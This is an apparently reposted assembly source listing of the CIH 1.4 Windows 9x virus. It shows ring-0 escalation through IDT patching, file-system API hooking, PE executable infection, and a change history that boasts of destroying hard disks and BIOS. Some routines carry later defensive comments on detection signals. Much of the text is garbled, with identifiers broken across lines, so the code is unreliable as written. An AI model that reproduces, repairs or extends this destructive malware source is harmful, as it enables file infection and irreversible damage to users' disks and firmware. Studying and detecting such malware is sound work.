
CIH 1.4源程序

 信息来源:黑客防线

; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; *                                                                          *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
; *                                                                          *
; *==========================================================================*
; * Modification History                                                     *
; *==========================================================================*
; * v1.0 1. Create the Virus Program.                                        *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.                         *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handling. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jump to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************


.586P

 

; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section)*
; ****************************************************************************


OriginalAppEXE SEGMENT

 

FileHeader:

db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h

db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h

db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h

db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh

db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h

db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h

db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh

db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh

db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h

db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah

db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h

db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h

db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h

db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h

db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h

db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h

db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h

db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

dd 00000000h, VirusSize

 

lea ecx, StopToRunVirusCode-@0[ebx]

push ecx

 

push eax

 

; *************************************

; * Let's Modify *

; * IDT(Interrupt Descriptor Table) *

; * to Get Ring0 Privilege... *

; *************************************

 

push eax ;

sidt [esp-02h] ; Get IDT Base Address

pop ebx ;

 

add ebx, HookExceptionNumber*08h+04h ; ZF
= 0


cli

 

mov ebp, [ebx] ; Get Exception Base

mov bp, [ebx-04h] ; Entry Point

 

lea esi, MyExceptionHook-@1[ecx]

 

push esi

 

mov [ebx-04h], si ;

shr esi, 16 ; Modify Excep
tion
mov [ebx+02h], si ; Entry Point
Address


pop esi

 

; *************************************

; * Generate Exception to Get Ring0 *

; *************************************

 

int HookExceptionNumber ; GenerateExce
ption
ReturnAddressOfEndException = $

 

; *************************************

; * Merge All Virus Code Section *

; *************************************

 

; *************************************

; * Generate Exception Again *

; *************************************

 

int HookExceptionNumber ; GenerateExce
ption Aga

 


; *************************************

; * Let's Restore *

; * Structured Exception Handling *

; *************************************

 

ReadyRestoreSE:

sti

xor ebx, ebx

jmp RestoreSE

; *************************************

; * When Exception Error Occurs, *

; * Our OS System should be in NT. *

; * So My Cute Virus will not *

; * Continue to Run, it Jmups to *

; * Original Application to Run. *

; *************************************

 

StopToRunVirusCode:

@1 = StopToRunVirusCode

 

xor ebx, ebx

mov eax, fs:[ebx]

mov esp, [eax]

 

RestoreSE:

pop dword ptr fs:[ebx]

pop eax

 

; *************************************

; * Return Original App to Execute *

; *************************************

 

pop ebp

 

push 00401000h ; Push Original

OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
tack


ret ; Return to Original App Entry Point

 

; *********************************************************

; * Ring0 Virus Game Initial Program *

; *********************************************************

 

; *********************************************************
; * MyExceptionHook                                       *
; *********************************************************
; Ring-0 handler reached through the IDT entry that the ring-3 stub above
; patched (sidt / mov [ebx-04h],si / mov [ebx+02h],si) and then raised with
; `int HookExceptionNumber`.
; In:  ZF  = dispatch flag set by the ring-3 side. The first `int` follows
;            `add ebx, HookExceptionNumber*08h+04h` with ZF = 0; the second
;            `int` presumably arrives with ZF = 1 (the merge-loop code that
;            sits between the two ints is not reproduced on this page).
;      ebx = pointer to byte +4 of the patched IDT entry (still from the stub)
;      ebp = original handler offset: low word in bp, high word in ebp>>16
;      esi = linear address of MyExceptionHook (pushed/popped by the stub)
;      edi = base of the allocated system page (second entry only)
; Out: iretd back to ring 3. First entry: eax = address of MyVirusStart,
;      edi = allocated page. "Already resident" entry: the return EIP on the
;      interrupt frame is retargeted to ReadyRestoreSE.
; Every path ends in iretd, or jumps to ExitRing0Init which restores the IDT
; entry first. DR0 doubles as the residency marker and later as the saved
; previous-hook pointer; a debug register holding a code pointer while no
; debugger is attached is a usable detection signal for this family, as is
; the transient rewrite of an IDT gate.
MyExceptionHook:
@2 = MyExceptionHook                        ; base symbol for the @2-relative fixups below

        jz      InstallMyFileSystemApiHook  ; ZF = 1: second trip, go install the IFS hook

; *************************************
; * Do My Virus Exist in System !?    *
; *************************************
        mov     ecx, dr0                    ; DR0 == 0 -> not resident yet
        jecxz   AllocateSystemMemoryPage

        ; Already resident: [esp] is the EIP pushed by the `int`. Shift it so the
        ; iretd in ExitRing0Init lands on ReadyRestoreSE instead of on the
        ; instruction after the int.
        ; NOTE(review): the operand was wrapped across three lines on this page
        ; and lost characters; the symbol defined earlier in the stub is
        ; ReturnAddressOfEndException.
        add     dword ptr [esp], ReadyRestoreSE-ReturnAddressOfdException

; *************************************
; * Return to Ring3 Initial Program   *
; *************************************
ExitRing0Init:
        mov     [ebx-04h], bp               ; put back the original handler offset:
        shr     ebp, 16                     ;   low word at entry+0 (ebx points at entry+4),
        mov     [ebx+02h], bp               ;   high word at entry+6
        iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
        mov     dr0, ebx                    ; mark "resident": DR0 <- IDT entry pointer (non-zero)

        ; Eight dword arguments for the VMM service; ecx is 0 here (jecxz was taken).
        push    00000000fh
        push    ecx
        push    0ffffffffh
        push    ecx
        push    ecx
        push    ecx
        push    000000001h
        push    000000002h
        int     20h                         ; VMMCALL _PageAllocate (VxD service thunk:
_PageAllocate = $                           ;   int 20h followed by the service-id dword)
        dd      00010053h                   ; author's note: uses EAX, ECX, EDX and flags
        add     esp, 08h*04h                ; caller removes the 8 arguments

        xchg    edi, eax                    ; EDI = start address of the allocated system memory
        lea     eax, MyVirusStart-@2[esi]   ; EAX = address of MyVirusStart (esi = MyExceptionHook)
        iretd                               ; back to the ring-3 initial program

; *************************************
; * Install My File System Api Hook   *
; *************************************
InstallMyFileSystemApiHook:
        lea     eax, FileSystemApiHook-@6[edi]  ; hook address inside the system-memory copy
                                                ; (@6 is defined outside this page; presumably the
                                                ; data-area base the copy is laid out from - verify)
        push    eax
        int     20h                         ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $         ; service-id slot of this call site; read back below
        dd      00400067h                   ; author's note: uses EAX, ECX, EDX and flags
        mov     dr0, eax                    ; DR0 <- returned OldFileSystemApiHook address
        pop     eax                         ; EAX = FileSystemApiHook address again

        ; Save what the author calls the old IFSMgr_InstallFileSystemApiHook entry
        ; point: the dword sitting in this routine's own service slot once the call
        ; above has been linked. (How the VMM rewrites the int 20h/dd thunk in place
        ; is not visible on this page - confirm against the VxD call convention.)
        mov     ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
        mov     edx, [ecx]
        mov     OldInstallFileSystemApiHook-@3[eax], edx

        ; Redirect that entry to the InstallFileSystemApiHook wrapper below, so any
        ; later installer of a file-system hook is re-chained beneath the virus hook.
        lea     eax, InstallFileSystemApiHook-@3[eax]
        mov     [ecx], eax

        cli                                 ; interrupts stay off until the ring-3 side's sti (ReadyRestoreSE)
        jmp     ExitRing0Init               ; undo the IDT patch, then iretd

 

; *********************************************************

; * Code Size of Merge Virus Code Section *

; *********************************************************

 

; Assembly-time offset of this point from the start of its segment (the segment
; directive itself is not on this page). The author uses it as the byte count of
; the "merge" virus code section that precedes it: the infection path later
; compares it against the free space left after the section table
; (`cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection`) before infecting.
CodeSizeOfMergeVirusCodeSection = offset $

 

; *********************************************************

; * IFSMgr_InstallFileSystemApiHook *

; *********************************************************

 

; *********************************************************
; * InstallFileSystemApiHook                              *
; *********************************************************
; Replacement entry for the IFSMgr_InstallFileSystemApiHook service
; (MyExceptionHook redirects the saved entry to this routine). Any component
; that installs a file-system API hook after the virus is resident passes
; through here, and the virus hook is re-installed on top of the new one.
; In:   [esp+4] = caller's hook address (the service's single argument)
; Out:  eax = result of the original service for the caller's hook
;       DR0 = result of re-installing FileSystemApiHook (the author's
;             "OldFileSystemApiHook" address, i.e. the previous hook)
; Preserves ebx (push/pop); ecx is only used as a throw-away pop target.
; Sequence: remove own hook -> install caller's hook via the original
;           service -> install own hook again via the original service.
; The remove/install/re-install pattern right after another driver's hook
; installation is characteristic of this family and is a useful thing for
; a hook-chain integrity check to look for.
InstallFileSystemApiHook:
        push    ebx                         ; keep caller's ebx; the argument is now at [esp+8]

        call    @4                          ; call/pop: ebx = address of @4 (position-independent)
@4:
        pop     ebx                         ; i.e. mov ebx, offset FileSystemApiHook ...
        add     ebx, FileSystemApiHook-@4   ; ... once the delta from @4 is added

        push    ebx                         ; argument: the virus's own hook
        int     20h                         ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $          ;   (int 20h + service-id dword thunk)
        dd      00400068h                   ; author's note: uses EAX, ECX, EDX and flags
        pop     eax                         ; discard the argument

        ; Call the original IFSMgr_InstallFileSystemApiHook
        ; to link the client's FileSystemApiHook.
        push    dword ptr [esp+8]           ; [esp+8] = caller's argument (above saved ebx and the return address)
        call    OldInstallFileSystemApiHook-@3[ebx]   ; saved entry; ebx-relative because @3 = FileSystemApiHook
        pop     ecx                         ; discard the argument

        push    eax                         ; keep the client's result: it becomes this routine's return value

        ; Call the original IFSMgr_InstallFileSystemApiHook
        ; to link the virus's FileSystemApiHook again, on top of the client's.
        push    ebx
        call    OldInstallFileSystemApiHook-@3[ebx]
        pop     ecx

        mov     dr0, eax                    ; adjust OldFileSystemApiHook address (previous hook in the chain)

        pop     eax                         ; restore the client's result
        pop     ebx
        ret

 

; *********************************************************

; * Static Data *

; *********************************************************

 

; Saved entry of the real IFSMgr_InstallFileSystemApiHook: written by
; MyExceptionHook (InstallMyFileSystemApiHook path) and called through by the
; InstallFileSystemApiHook wrapper above. It is addressed @3-relative from
; FileSystemApiHook, so its position relative to that label must not change.
OldInstallFileSystemApiHook dd ?

 

; *********************************************************

; * IFSMgr_FileSystemHook *

; *********************************************************

 

; *************************************

; * IFSMgr_FileSystemHook Entry Point *

; *************************************

 

FileSystemApiHook:

@3 = FileSystemApiHook

 

pushad

 

call @5 ;

@5: ;

pop esi ; mov esi, offset VirusGameDat
aStartAdd
ss

add esi, VirusGameDataStartAddress-@5

 

; *************************************

; * Is OnBusy !? *

; *************************************

 

test byte ptr (OnBusy-@6)[esi], 01h ; if (
OnBusy )
jnz pIFSFunc ; goto
pIFSFunc


; *************************************

; * Is OpenFile !? *

; *************************************

 

; if ( NotOpenFile )

; goto prevhook

lea ebx, [esp+20h+04h+04h]

cmp dword ptr [ebx], 00000024h

jne prevhook

 

; *************************************

; * Enable OnBusy *

; *************************************

 

inc byte ptr (OnBusy-@6)[esi] ; Enab
le OnBusy


; *************************************

; * Get FilePath's DriveNumber, *

; * then Set the DriveName to *

; * FileNameBuffer. *

; *************************************

; * Ex. If DriveNumber is 03h, *

; * DriveName is 'C:'. *

; *************************************

 

; mov esi, offset FileNameBuffer

add esi, FileNameBuffer-@6

 

push esi

 

mov al, [ebx+04h]

cmp al, 0ffh

je CallUniToBCSPath

 

add al, 40h

mov ah, ':'

 

mov [esi], eax

 

inc esi

inc esi

 

; *************************************

; * UniToBCSPath *

; *************************************

; * This Service Converts *

; * a Canonicalized Unicode Pathname *

; * to a Normal Pathname in the *

; * Specified BCS Character Set. *

; *************************************

 

CallUniToBCSPath:

push 00000000h

push FileNameBufferSize

mov ebx, [ebx+10h]

mov eax, [ebx+0ch]

add eax, 04h

push eax

push esi

int 20h ; VXDCall UniToBCSPath

UniToBCSPath = $

dd 00400041h

add esp, 04h*04h

 

; *************************************

; * Is FileName '.EXE' !? *

; *************************************

 

; cmp [esi+eax-04h], '.EXE'

cmp [esi+eax-04h], 'EXE.'

pop esi

jne DisableOnBusy

 

IF DEBUG

 

; *************************************

; * Only for Debug *

; *************************************

 

; cmp [esi+eax-06h], 'FUCK'

cmp [esi+eax-06h], 'KCUF'

jne DisableOnBusy

 

ENDIF

 

; *************************************

; * Is Open Existing File !? *

; *************************************

 

; if ( NotOpenExistingFile )

; goto DisableOnBusy

cmp word ptr [ebx+18h], 01h

jne DisableOnBusy

 

; *************************************

; * Get Attributes of the File *

; *************************************

 

mov ax, 4300h

int 20h ; VXDCall IFSMgr_Ring0_FileIO

IFSMgr_Ring0_FileIO = $

dd 00400032h

 

jc DisableOnBusy

 

push ecx

 

; *************************************

; * Get IFSMgr_Ring0_FileIO Address *

; *************************************

 

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7
)[esi]
mov edi, [edi]

 

; *************************************

; * Is Read-Only File !? *

; *************************************

 

test cl, 01h

jz OpenFile

 

; *************************************

; * Modify Read-Only File to Write *

; *************************************

 

mov ax, 4301h

xor ecx, ecx

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; *************************************

; * Open File *

; *************************************

 

OpenFile:

xor eax, eax

mov ah, 0d5h

xor ecx, ecx

xor edx, edx

inc edx

mov ebx, edx

inc ebx

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

xchg ebx, eax ; mov ebx, FileHandle

 

; *************************************

; * Need to Restore *

; * Attributes of the File !? *

; *************************************

 

pop ecx

 

pushf

 

test cl, 01h

jz IsOpenFileOK

 

; *************************************

; * Restore Attributes of the File *

; *************************************

 

mov ax, 4301h

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; *************************************

; * Is Open File OK !? *

; *************************************

 

IsOpenFileOK:

popf

 

jc DisableOnBusy

 

; *************************************

; * Open File Already Succeed. ^__^ *

; *************************************

 

push esi ; Push FileNameBuffer Address
to Stack


pushf ; Now CF = 0, Push Flag to Sta
ck


add esi, DataBuffer-@7 ; mov esi, offset D
ataBuffer


; ***************************

; * Get OffsetToNewHeader *

; ***************************

 

xor eax, eax

mov ah, 0d6h

 

; For Doing Minimal VirusCode's Length,

; I Save EAX to EBP.

mov ebp, eax

 

push 00000004h

pop ecx

push 0000003ch

pop edx

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; * EDX = 'PE\0\0' Signature of *

; * ImageFileHeader Pointer's *

; * Former Byte. *

; * ESI = DataBuffer Address ==> @8 *

; * EDI = IFSMgr_Ring0_FileIO Address *

; * EBP = D600h ==> Read Data in File *

; *************************************

; * Stack Dump : *

; * *

; * ESP => ------------------------- *

; * | EFLAG(CF=0) | *

; * ------------------------- *

; * | FileNameBufferPointer | *

; * ------------------------- *

; * | EDI | *

; * ------------------------- *

; * | ESI | *

; * ------------------------- *

; * | EBP | *

; * ------------------------- *

; * | ESP | *

; * ------------------------- *

; * | EBX | *

; * ------------------------- *

; * | EDX | *

; * ------------------------- *

; * | ECX | *

; * ------------------------- *

; * | EAX | *

; * ------------------------- *

; * | Return Address | *

; * ------------------------- *

; *************************************

 

push ebx ; Save File Handle

 

push 00h ; Set VirusCodeSectionTableEnd
Mark


; ***************************

; * Let's Set the *

; * Virus' Infected Mark *

; ***************************

 

push 01h ; Size

push edx ; Pointer of File

push edi ; Address of Buffer

 

; ***************************

; * Save ESP Register *

; ***************************

 

mov dr1, esp

 

; ***************************

; * Let's Set the *

; * NewAddressOfEntryPoint *

; * ( Only First Set Size ) *

; ***************************

 

push eax ; Size

 

; ***************************

; * Let's Read *

; * Image Header in File *

; ***************************

 

mov eax, ebp

mov cl, SizeOfImageHeaderToRead

add edx, 07h ; Move EDX to NumberOfSection
s
call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; ***************************

; * Let's Set the *

; * NewAddressOfEntryPoint *

; * ( Set Pointer of File, *

; * Address of Buffer ) *

; ***************************

 

lea eax, (AddressOfEntryPoint-@8)[edx]

push eax ; Pointer of File

 

lea eax, (NewAddressOfEntryPoint-@8)[esi]

push eax ; Address of Buffer

 

; ***************************

; * Move EDX to the Start *

; * of SectionTable in File *

; ***************************

 

movzx eax, word ptr (SizeOfOptionalHeader-@8
)[esi]
lea edx, [eax+edx+12h]

 

; ***************************

; * Let's Get *

; * Total Size of Sections *

; ***************************

 

mov al, SizeOfScetionTable

 

; I Assume NumberOfSections <= 0ffh

mov cl, (NumberOfSections-@8)[esi]

 

mul cl

 

; ***************************

; * Let's Set Section Table *

; ***************************

 

; Move ESI to the Start of SectionTable

lea esi, (StartOfSectionTable-@8)[esi]

 

push eax ; Size

push edx ; Pointer of File

push esi ; Address of Buffer

 

; ***************************

; * The Code Size of Merge *

; * Virus Code Section and *

; * Total Size of Virus *

; * Code Section Table Must *

; * be Small or Equal the *

; * Unused Space Size of *

; * Following Section Table *

; ***************************

 

inc ecx

push ecx ; Save NumberOfSections+1

 

shl ecx, 03h

push ecx ; Save TotalSizeOfVirusCodeSec
tionTable


add ecx, eax

add ecx, edx

 

sub ecx, (SizeOfHeaders-@9)[esi]

not ecx

inc ecx

 

; Save My Virus First Section Code

; Size of Following Section Table...

; ( Not Include the Size of Virus Code Section
Table )
push ecx

 

xchg ecx, eax ; ECX = Size of Sectio
n Table


; Save Original Address of Entry Point

mov eax, (AddressOfEntryPoint-@9)[esi]

add eax, (ImageBase-@9)[esi]

mov (OriginalAddressOfEntryPoint-@9)[esi],
eax


cmp word ptr [esp], small CodeSizeOfMergeV
irusCodeS
tion

jl OnlySetInfectedMark

 

; ***************************

; * Read All Section Tables *

; ***************************

 

mov eax, ebp

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; ***************************

; * Full Modify the Bug : *

; * WinZip Self-Extractor *

; * Occurs Error... *

; ***************************

; * So When User Opens *

; * WinZip Self-Extractor, *

; * Virus Doesn't Infect it.*

; ***************************

; * First, Virus Gets the *

; * PointerToRawData in the *

; * Second Section Table, *

; * Reads the Section Data, *

; * and Tests the String of *

; * 'WinZip(R)'...... *

; ***************************

 

xchg eax, ebp

 

push 00000004h

pop ecx

 

push edx

mov edx, (SizeOfScetionTable+PointerToRawD
ata-@9)[e
]

add edx, 12h

 

call edi ; VXDCall IFSMgr_Ring0_FileIO

 

; cmp [esi], 'nZip'

cmp dword ptr [esi], 'piZn'

je NotSetInfectedMark

 

pop edx

 

; ***************************

; * Let's Set Total Virus *

; * Code Section Table *

; ***************************

 

; EBX = My Virus First Section Code

; Size of Following Section Table

pop ebx

pop edi ; EDI = TotalSizeOfVirusCodeSe
ctionTabl
pop ecx ; ECX = NumberOfSections+1

 

push edi ; Size

 

add edx, ebp

push edx ; Pointer of File

 

add ebp, esi 
 
 
